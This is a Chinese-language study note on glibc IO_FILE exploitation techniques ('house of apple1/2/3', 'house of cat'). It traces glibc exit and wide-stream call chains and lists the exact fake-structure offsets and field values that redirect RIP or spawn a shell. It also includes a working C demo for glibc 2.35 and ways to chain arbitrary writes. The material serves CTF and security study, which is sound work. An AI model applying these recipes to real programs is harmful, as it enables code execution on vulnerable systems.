  • 加载ELF可执行文件
    • 动态链接程序:发现.interp
      • 内核加载动态链接器ld.so
      • 跳转到ld.so入口地址->_dl_start (dl-start.S)
        • _dl_init
          • call_init (执行ld.so自身的.init_array)
      • ld.so加载依赖库 (libc.so等) 并重定位
      • 跳转到程序入口->_start (start.S)
    • 静态链接程序:直接跳转到_start (start.S)
  • _start
    • __libc_start_main
      • 注册析构函数:
      • 静态链接:__cxa_atexit(call_fini)
        • 程序自身析构器
      • 动态链接:__cxa_atexit(rtld_fini)
        • 动态链接器统一收尾调用dl_fini
      • call_init(执行程序和libc.init_array)
  • __libc_start_call_main
    • 调用main()
    • exit(main())
  • 用户调用exit(status)
    • __run_exit_handlers(status)
      • 调用 TLS 析构函数__call_tls_dtors
      • 遍历exit_function_list
        • ef_cxa
          • 静态程序:call_fini
            • 执行程序自身.fini_array
          • 动态程序:rtld_fini
            • _dl_fini
              • 按依赖顺序执行共享库.fini_array/DT_FINI
              • 清理动态链接器资源
        • ef_at -> atexit注册的函数
        • ef_on -> on_exit注册的函数
        • 其他类型忽略
      • 若执行期间有新回调注册 → 回到链表开头
      • 释放动态分配的回调节点
      • run_list_atexit = true,则执行__libc_atexit钩子:默认为_IO_cleanup()
    • _exit(status)
  • 内核:彻底终止进程

house of apple2 | house of cat

  • 漏洞产生:_wide_data结构中有一个类似vtable_wide_vtable指向_IO_jump_t结构,与vtable相同,对glibc中也定义了调用_wide_vtable中函数的宏,其中在 glibc 中真正使用到的有_IO_WSETBUF、_IO_WUNDERFLOW、_IO_WDOALLOCATE,但与vtable不同的是这三个宏均缺少对_wide_vtable位置的检查 _IO_OVERFLOW
    #define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
    #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
    _IO_WOVERFLOW
    #define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
    #define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
    #define _IO_WIDE_JUMPS(THIS) _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

_IO_wfile_overflow

  • 调用链
  1. _IO_wfile_overflow
    wint_t
    _IO_wfile_overflow (FILE *f, wint_t wch)
    {
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    /* If currently reading or no buffer allocated. */
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0)
    {
    _IO_wdoallocbuf (f);// 需要走到这里
    // ......
    }
    }
    }
    满足条件:
  • f->_flags & _IO_NO_WRITES == 0
  • f->_flags & _IO_CURRENTLY_PUTTING == 0
  • f->_wide_data->_IO_write_base == 0
  1. _IO_wdoallocbuf
    void
    _IO_wdoallocbuf (FILE *fp)
    {
    if (fp->_wide_data->_IO_buf_base)
    return;
    if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)// _IO_WXXXX调用
    return;
    _IO_wsetb (fp, fp->_wide_data->_shortbuf,
    fp->_wide_data->_shortbuf + 1, 0);
    }
    libc_hidden_def (_IO_wdoallocbuf)
    满足条件:
  • fp->_wide_data->_IO_buf_base == 0
  • fp->_flags & _IO_UNBUFFERED == 0
  1. _IO_WDOALLOCATE

  2. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

综上所述: * _flags设置为~(2 | 0x8 | 0x800),如果不需要控制rdi,设置为0即可;如果需要获得shell,可设置为;sh; * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_overflow即可 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_base设置为0,即满足*(A + 0x18) = 0 * _wide_data->_IO_buf_base设置为0,即满足*(A + 0x30) = 0 * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wfile_underflow_mmap

  • 调用链
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;

    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp);// 需要走到这里
    }
    //......
    }
    满足条件:
  • fp->_flags & _IO_NO_READS == 0
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_wide_data->_IO_buf_base == NULL,fp->_wide_data->_IO_save_base == NULL
  1. _IO_wdoallocbuf

  2. _IO_WDOALLOCATE

  3. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

综上所述: * _flags设置为~4,如果不需要控制rdi,设置为0即可;如果需要获得shell,可设置为;sh; * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_overflow_mmap即可 * _IO_read_ptr < _IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _wide_data->_IO_buf_base设置为0,即满足*(A + 0x30) = 0 * _wide_data->_IO_save_base设置为0或者合法的可被free的地址,即满足*(A + 0x40) = 0 * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wdefault_xsgetn

  • 调用链
  1. _IO_wdefault_xsgetn
    size_t
    _IO_wdefault_xsgetn (FILE *fp, void *data, size_t n)
    {
    size_t more = n;
    wchar_t *s = (wchar_t*) data;
    for (;;)
    {
    /* Data available. */
    ssize_t count = (fp->_wide_data->_IO_read_end
    - fp->_wide_data->_IO_read_ptr);
    if (count > 0)
    {
    if ((size_t) count > more)
    count = more;
    if (count > 20)
    {
    s = __wmempcpy (s, fp->_wide_data->_IO_read_ptr, count);
    fp->_wide_data->_IO_read_ptr += count;
    }
    else if (count <= 0)
    count = 0;
    else
    {
    wchar_t *p = fp->_wide_data->_IO_read_ptr;
    int i = (int) count;
    while (--i >= 0)
    *s++ = *p++;
    fp->_wide_data->_IO_read_ptr = p;
    }
    more -= count;
    }
    if (more == 0 || __wunderflow (fp) == WEOF)
    break;
    }
    return n - more;
    }
    libc_hidden_def (_IO_wdefault_xsgetn)
    满足条件:
  • 由于more是第三个参数,所以不能为0,即rdx寄存器不为0
  • 直接设置fp->_wide_data->_IO_read_ptr == fp->_wide_data->_IO_read_end,使得count0,不进入if分支
  1. __wunderflow
wint_t
__wunderflow (FILE *fp)
{
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide (fp, 1) != 1))
return WEOF;

if (fp->_mode == 0)
_IO_fwide (fp, 1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_wget_mode (fp) == EOF)
return WEOF;
// ......
}

满足条件: * 设置fp->mode > 0,并且fp->_flags & _IO_CURRENTLY_PUTTING != 0

  1. _IO_switch_to_wget_mode
int
_IO_switch_to_wget_mode (FILE *fp)
{
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) // 需要走到这里
return EOF;
// .....
}

满足条件: * fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base

  1. _IO_WOVERFLOW

  2. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

综上所述: * _flags设置为0x800 * vtable设置为_IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps地址(加减偏移),使其能成功调用_IO_wdefault_xsgetn即可 * _mode设置为大于0,即满足*(fp + 0xc0) > 0 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr == _wide_data->_IO_read_end,即满足*A == *(A + 8) * _wide_data->_IO_write_ptr > _wide_data->_IO_write_base,即满足*(A + 0x20) > *(A + 0x18) * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wfile_seekoff(house of cat)

  • 调用链
  1. _IO_wfile_seekoff
    off64_t 
    _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) {
    off64_t result;
    off64_t delta, new_offset;
    long int count;
    /*短路变成一个单独的功能。 我们不想混合任何功能,也不想触及 FILE 对象内部的任何内容。*/
    if (mode == 0)
    return do_ftell_wide (fp);

    ...
    bool was_writing = ((fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp));
    /*刷新未写入的字符。(如果我们在缓冲区内查找,这可能会执行不必要的写入。但是为了能够切换到阅读,我们需要将 egptr 设置为 pptr。 这在当前的设计中是无法做到的,它假设 file_ptr() 是 eGptr。 无论如何,由于我们可能在close()时最终刷新,因此没有太大区别。FIXME:模拟内存映射文件。*/
    if (was_writing && _IO_switch_to_wget_mode (fp))
    return WEOF;
    满足条件:
  • _mode不为0
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base或 (fp)->_flags & 0x0800 != 0
  1. _IO_switch_to_wget_mode 满足条件:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  1. _IO_WOVERFLOW

  2. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

综上所述: * _flags设置为~0x8,如果不能保证_lock指向可读写内存则_flags |= 0x8000 * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_seekoff即可 * _mode设置为大于0,即满足*(fp + 0xc0) > 0 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr > _wide_data->_IO_read_end,即满足*A > *(A + 8) * _wide_data->_IO_write_ptr > _wide_data->_IO_write_base,即满足*(A + 0x20) > *(A + 0x18) * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

house of apple1

  • 核心:在堆上伪造一个_IO_FILE结构体并已知其地址为A,将A + 0xd8(vtable)替换为_IO_wstrn_jumps地址,A + 0xa0(_wide_data)设置为B,并设置其他成员以便能调用到_IO_OVERFLOWexit函数则会一路调用到_IO_wstrn_overflow函数,并将BB + 0x30的地址区域的内容都替换为A + 0xf0或者A + 0x1f0
    static wint_t
    _IO_wstrn_overflow (FILE *fp, wint_t c)
    {
    _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;
    if (fp->_wide_data->_IO_buf_base != snf->overflow_buf)
    {
    _IO_wsetb (fp, snf->overflow_buf,
    snf->overflow_buf + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)), 0);
    //只要控制了fp->_wide_data,就可以控制从fp->_wide_data开始一定范围内的内存的值,也就等同于任意地址写已知地址。
    fp->_wide_data->_IO_write_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_read_end = (snf->overflow_buf
    + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)));
    }

    fp->_wide_data->_IO_write_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_write_end = snf->overflow_buf;
    return c;
    }
  • 有时候需要绕过_IO_wsetb函数里面的free
    #define _IO_FLAGS2_USER_WBUF 8
    //设置f->_flags2为8即可绕过
    void
    _IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)
    {
    if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))
    free (f->_wide_data->_IO_buf_base); // 其不为0的时候不要执行到这里
    f->_wide_data->_IO_buf_base = b;
    f->_wide_data->_IO_buf_end = eb;
    if (a)
    f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;
    else
    f->_flags2 |= _IO_FLAGS2_USER_WBUF;
    }

demo

#2.35-0ubuntu3
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<unistd.h>
#include <string.h>

void main()
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setvbuf(stderr, 0, 2, 0);
    puts("[*] allocate a 0x100 chunk");
    size_t *p1 = malloc(0xf0);
    size_t *tmp = p1;
    size_t old_value = 0x1122334455667788;
    for (size_t i = 0; i < 0x100 / 8; i++)
    {
        p1[i] = old_value;
    }
    puts("===========================old value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================old value=======================");
    size_t puts_addr = (size_t)&puts;
    printf("[*] puts address: %p\n", (void *)puts_addr);
    size_t stderr_write_ptr_addr = puts_addr + 0x1997f8;
    printf("[*] stderr->_IO_write_ptr address: %p\n", (void *)stderr_write_ptr_addr);
    size_t stderr_flags2_addr = puts_addr + 0x199844;
    printf("[*] stderr->_flags2 address: %p\n", (void *)stderr_flags2_addr);
    size_t stderr_wide_data_addr = puts_addr + 0x199870;
    printf("[*] stderr->_wide_data address: %p\n", (void *)stderr_wide_data_addr);
    size_t sdterr_vtable_addr = puts_addr + 0x1998a8;
    printf("[*] stderr->vtable address: %p\n", (void *)sdterr_vtable_addr);
    size_t _IO_wstrn_jumps_addr = puts_addr + 0x194ef0;
    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);
    puts("[+] step 1: change stderr->_IO_write_ptr to -1");
    *(size_t *)stderr_write_ptr_addr = (size_t)-1;
    puts("[+] step 2: change stderr->_flags2 to 8");
    *(size_t *)stderr_flags2_addr = 8;
    puts("[+] step 3: replace stderr->_wide_data with the allocated chunk");
    *(size_t *)stderr_wide_data_addr = (size_t)p1;
    puts("[+] step 4: replace stderr->vtable with _IO_wstrn_jumps");
    *(size_t *)sdterr_vtable_addr = (size_t)_IO_wstrn_jumps_addr;
    puts("[+] step 5: call fcloseall and trigger house of apple");
    fcloseall();
    tmp = p1;
    puts("===========================new value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================new value=======================");
}
输出结果:
[*] allocate a 0x100 chunk
===========================old value=======================
[0x56142e11b2a0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2b0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2c0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2d0]: 0x1122334455667788 0x1122334455667788
===========================old value=======================
[*] puts address: 0x7cb7d0280ed0
[*] stderr->_IO_write_ptr address: 0x7cb7d041a6c8
[*] stderr->_flags2 address: 0x7cb7d041a714
[*] stderr->_wide_data address: 0x7cb7d041a740
[*] stderr->vtable address: 0x7cb7d041a778
[*] _IO_wstrn_jumps address: 0x7cb7d0415dc0
[+] step 1: change stderr->_IO_write_ptr to -1
[+] step 2: change stderr->_flags2 to 8
[+] step 3: replace stderr->_wide_data with the allocated chunk
[+] step 4: replace stderr->vtable with _IO_wstrn_jumps
[+] step 5: call fcloseall and trigger house of apple
===========================new value=======================
[0x56142e11b2a0]: 0x00007cb7d041a790 0x00007cb7d041a890
[0x56142e11b2b0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2c0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2d0]: 0x00007cb7d041a790 0x00007cb7d041a890
===========================new value=======================

总结:在只给了1largebin attack的前提下,能利用_IO_wstrn_overflow函数将任意地址空间上的值修改为一个已知地址,并且这个已知地址通常为堆地址。那么,当我们伪造两个甚至多个_IO_FILE结构体,并将这些结构体通过chain字段串联起来就能进行组合利用

修改tcache线程(< 2.37)

  • 伪造至少两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改tcache全局变量为已知值,也就控制了tcache bin的分配
  • 第二个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_str_overflow中的malloc函数任意地址分配,并使用memcpy使得能够任意地址写任意值
  • 利用两次任意地址写任意值修改pointer_guardIO_accept_foreign_vtables的值绕过_IO_vtable_check函数的检测(或者利用一次任意地址写任意值修改libc.got里面的函数地址,很多IO流函数调用strlen/strcpy/memcpy/memset等都会调到libc.got里面的函数)
  • 利用一个_IO_FILE,随意伪造vtable劫持程序控制流即可

修改mp_结构体

  • 伪造至少两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改mp_.tcache_bins为很大的值,使得很大的chunk也通过tcachebin去管理
  • 接下来的过程与上面的思路是一样的

修改pointer_guard线程变量+house of emma

  • 伪造两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改tls结构体pointer_guard的值为已知值
  • 第二个_IO_FILE结构体用来做house of emma利用即可控制程序执行流

修改global_max_fast全局变量

修改掉这个变量后,直接释放超大的chunk,去覆盖掉point_guard或者tcache变量

house of apple3

FILE结构体中有一个成员struct _IO_codecvt *_codecvt;,偏移为0x98。该结构体参与宽字符的转换工作,结构体相关定义如下:

struct _IO_codecvt
{
_IO_iconv_t __cd_in;
_IO_iconv_t __cd_out;
};

typedef struct
{
struct __gconv_step *step;
struct __gconv_step_data step_data;
} _IO_iconv_t;

struct __gconv_step
{
struct __gconv_loaded_object *__shlib_handle;
const char *__modname;

/* For internal use by glibc. (Accesses to this member must occur
when the internal __gconv_lock mutex is acquired). */
int __counter;

char *__from_name;
char *__to_name;

__gconv_fct __fct;
__gconv_btowc_fct __btowc_fct;
__gconv_init_fct __init_fct;
__gconv_end_fct __end_fct;

/* Information about the number of bytes needed or produced in this
step. This helps optimizing the buffer sizes. */
int __min_needed_from;
int __max_needed_from;
int __min_needed_to;
int __max_needed_to;

/* Flag whether this is a stateful encoding or not. */
int __stateful;

void *__data; /* Pointer to step-local data. */
};

struct __gconv_step_data
{
unsigned char *__outbuf; /* Output buffer for this step. */
unsigned char *__outbufend; /* Address of first byte after the output
buffer. */

/* Is this the last module in the chain. */
int __flags;

/* Counter for number of invocations of the module function for this
descriptor. */
int __invocation_counter;

/* Flag whether this is an internal use of the module (in the mb*towc*
and wc*tomb* functions) or regular with iconv(3). */
int __internal_use;

__mbstate_t *__statep;
__mbstate_t __state; /* This element must not be used directly by
any module; always use STATEP! */
};
house of apple3的利用主要关注以下三个函数:__libio_codecvt_out__libio_codecvt_in__libio_codecvt_length。三个函数的利用点都差不多,以__libio_codecvt_in为例,源码分析如下:
enum __codecvt_result
__libio_codecvt_in (struct _IO_codecvt *codecvt, __mbstate_t *statep,
const char *from_start, const char *from_end,
const char **from_stop,
wchar_t *to_start, wchar_t *to_end, wchar_t **to_stop)
{
enum __codecvt_result result;
// gs 源自第一个参数
struct __gconv_step *gs = codecvt->__cd_in.step;
int status;
size_t dummy;
const unsigned char *from_start_copy = (unsigned char *) from_start;

codecvt->__cd_in.step_data.__outbuf = (unsigned char *) to_start;
codecvt->__cd_in.step_data.__outbufend = (unsigned char *) to_end;
codecvt->__cd_in.step_data.__statep = statep;

__gconv_fct fct = gs->__fct;
#ifdef PTR_DEMANGLE
// 如果gs->__shlib_handle不为空,则会用__pointer_guard去解密
// 这里如果可控,设置为NULL即可绕过解密
if (gs->__shlib_handle != NULL)
PTR_DEMANGLE (fct);
#endif
// 这里有函数指针调用
// 这个宏就是调用fct(gs, ...)
status = DL_CALL_FCT (fct,
(gs, &codecvt->__cd_in.step_data, &from_start_copy,
(const unsigned char *) from_end, NULL,
&dummy, 0, 0));
// ......
}
其中,__gconv_fctDL_CALL_FCT被定义为:
/* Type of a conversion function.  */
typedef int (*__gconv_fct) (struct __gconv_step *, struct __gconv_step_data *,
const unsigned char **, const unsigned char *,
unsigned char **, size_t *, int, int);

#ifndef DL_CALL_FCT
# define DL_CALL_FCT(fct, args) fct args
#endif
#### _IO_wfile_underflow

  • 调用链
  1. _IO_wfile_underflow

    wint_t
    _IO_wfile_underflow (FILE *fp)
    {
    struct _IO_codecvt *cd;
    enum __codecvt_result status;
    ssize_t count;

    /* C99 requires EOF to be "sticky". */

    // 不能进入这个分支
    if (fp->_flags & _IO_EOF_SEEN)
    return WEOF;
    // 不能进入这个分支
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // 不能进入这个分支
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    // 需要进入这个分支
    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr < fp->_IO_read_end)
    {
    /* There is more in the external. Convert it. */
    const char *read_stop = (const char *) fp->_IO_read_ptr;

    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;
    // 需要一路调用到这里
    status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    // ......
    }
    }

  2. __libio_codecvt_in

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

综上所述: * _flags设置为~(4 | 0x10) * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_underflow即可 * fp->_IO_read_ptr < fp->_IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data保持默认,或者设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC。如果_wide_data也可控的话,rsi也能控制

_IO_wfile_underflow_mmap

  • 调用链
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;
    // 不能进入这个分支
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // 不能进入这个分支
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    // 最好不要进入这个分支
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    // 最好不要进入这个分支
    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp);// 需要走到这里
    }
    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;

    // 需要调用到这里
    __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    //......
    }
    满足条件:
  • fp->_flags & _IO_NO_READS == 0
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_buf_base != NULL
  1. __libio_codecvt_in

  2. DL_CALL_FCT

  3. gs = fp->_codecvt->__cd_in.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~4 * vtable设置为_IO_wfile_jumps_mmap地址(加减偏移),使其能成功调用_IO_wfile_underflow_mmap即可 * fp->_IO_read_ptr < fp->_IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data保持默认,或者设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _wide_data->_IO_buf_base设置为非0,即满足*(A + 0x30) != 0 * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果_wide_data也可控的话,rsi也能控制

_IO_wdo_write

  • 调用链
  1. _IO_new_file_sync
    int
    _IO_new_file_sync (FILE *fp)
    {
    ssize_t delta;
    int retval = 0;

    /* char* ptr = cur_ptr(); */
    if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;//调用到这里
    //......
    }
    满足条件:
  • fp->_IO_write_ptr > fp->_IO_write_base
  1. _IO_do_flush
    #define _IO_do_flush(_f) \
    ((_f)->_mode <= 0 \
    ? _IO_do_write(_f, (_f)->_IO_write_base, \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base) \
    : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base, \
    ((_f)->_wide_data->_IO_write_ptr \
    - (_f)->_wide_data->_IO_write_base)))
    满足条件:
  • fp->_mode > 0
  • 此时的第二个参数为fp->_wide_data->_IO_write_base
  • 第三个参数为fp->_wide_data->_IO_write_ptr - fp->_wide_data->_IO_write_base
  1. _IO_wdo_write
    int
    _IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
    {
    struct _IO_codecvt *cc = fp->_codecvt;

    // 第三个参数必须要大于0
    if (to_do > 0)
    {
    if (fp->_IO_write_end == fp->_IO_write_ptr
    && fp->_IO_write_end != fp->_IO_write_base)
    {// 不能进入这个分支
    if (_IO_new_do_write (fp, fp->_IO_write_base,
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
    return WEOF;
    }

    // ......

    /* Now convert from the internal format into the external buffer. */
    // 需要调用到这里
    result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
    data, data + to_do, &new_data,
    write_ptr,
    buf_end,
    &write_ptr);
    //......
    }
    }
    满足条件:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  • fp->_IO_write_end == fp->_IO_write_ptr && fp->_IO_write_end != fp->_IO_write_base为假
  1. __libio_codecvt_out

  2. DL_CALL_FCT

  3. `gs = fp->_codecvt->__cd_out.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~4 * vtable设置为_IO_file_jumps地址(加减偏移),使其能成功调用_IO_new_file_sync即可 * _mode > 0,即满足(fp + 0xc0) > 0 * _IO_write_end != _IO_write_ptr或者_IO_write_end == _IO_write_base,即满足*(fp + 0x30) != *(fp + 0x28)或者*(fp + 0x30) == *(fp + 0x20) * _wide_data设置为堆地址,假设地址为A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_ptr >= _wide_data->_IO_write_base,即满足*(A + 0x20) >= *(A + 0x18) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果_wide_data也可控的话,rsi也能控制

